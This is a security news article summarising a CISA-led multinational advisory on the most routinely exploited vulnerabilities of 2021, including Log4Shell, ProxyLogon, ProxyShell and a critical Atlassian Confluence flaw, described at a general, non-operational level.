Which were the most routinely exploited security vulnerabilities in 2021?
A new report released by CISA in cooperation with the authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom revealed an advisory containing the most exploited in cyberattacks vulnerabilities.
So, what does the advisory say?
The Most Exploited Vulnerabilities in 2021
Last year, on a global scale, threat actors mainly targeted internet-facing systems, including email servers and VPN (virtual private network) servers using newly disclosed security flaws. It is noteworthy that, for a predominant number of the top exploited bugs, researchers or other actors released proof of concept codes (PoC) within two weeks of the vulnerability’s disclosure. This action proves to facilitate exploitation by a broader range of threat actors, CISA noted.
Threat actors also continued to leverage publicly known, older software flaws, some of which were exploited in 2020 and previous years. The exploitation of older vulnerabilities reveals the extended risk to organizations failing to address issues in their software products. The use of software no longer supported by a vendor demonstrates the same risk.
The list of the said vulnerabilities includes the following…
CVE-2021-44228, or the Log4Shell Exploit
CVE-2021-44228, or the so-called Log4Shell exploit, affects Apache’s Log4j library, an open-source logging framework. Hackers can exploit the issue by using a specially crafted request to an exposed system, causing arbitrary code execution and full system takeover. Once this is achieved, the threat actor can steal information, launch ransomware, or carry out other malicious activities. The Log4Shell exploit was revealed in December 2021, but its rapid and widespread exploitation shows the extended abilities of threat actors to quickly weaponize known flaws and target organizations prior to patching, CISA noted.
It is noteworthy that the exploit was leveraged by the Khonsari ransomware family in attacks against Windows servers. The same attacks were downloading an additional malicious payload – the Orcus remote access trojan.
The ProxyLogon Vulnerabilities
The vulnerabilities are known under these identifiers: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. They affect Microsoft Exchange Server. Affected versions include Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019.
The flaws have been used as part of an attack chain. To be successfully initiated, an attack requires an untrusted connection to a specific Exchange server port, 443. This loophole can be protected by restricting untrusted connection, or by setting up a VPN to separate the server from external access. However, these mitigation tricks only offer partial protection. The company warns that other portions of the chain attack can be triggered if an attacker already has access or can convince an administrator to run a malicious file.
The ProxyShell Exploit
CISA released an alert last August warning that cybercriminals were exploiting the so-called ProxyShell Microsoft Exchange vulnerabilities, known as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. Successful exploitation enables remote threat actors to perform arbitrary code execution. “These vulnerabilities reside within the Microsoft Client Access Service (CAS), which typically runs on port 443 in Microsoft Internet Information Services (IIS) (e.g., Microsoft’s web server). CAS is commonly exposed to the internet to enable users to access their email via mobile devices and web browsers,” CISA noted.
The Critical Atlassian Confluence Flaw
CVE-2021-26084 is a vulnerability in Atlassian Confluence deployments across Windows and Linux. The flaw is critical, and has been exploited to deploy web shells causing the execution of cryptocurrency miners on vulnerable systems. the issue is related to an Object-Graph Navigation Language (OGNL) injection in the Webwork module of Atlassian Confluence Server and Data Center. The vulnerability can be leveraged by remote attackers by sending a crafted HTTP requests with a malicious parameter to a vulnerable server. This could then lead to arbitrary code execution “in the security context of the affected server,” as pointed out by Trend Micro researchers upon disclosure.
“Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors,” CISA’s advisory said.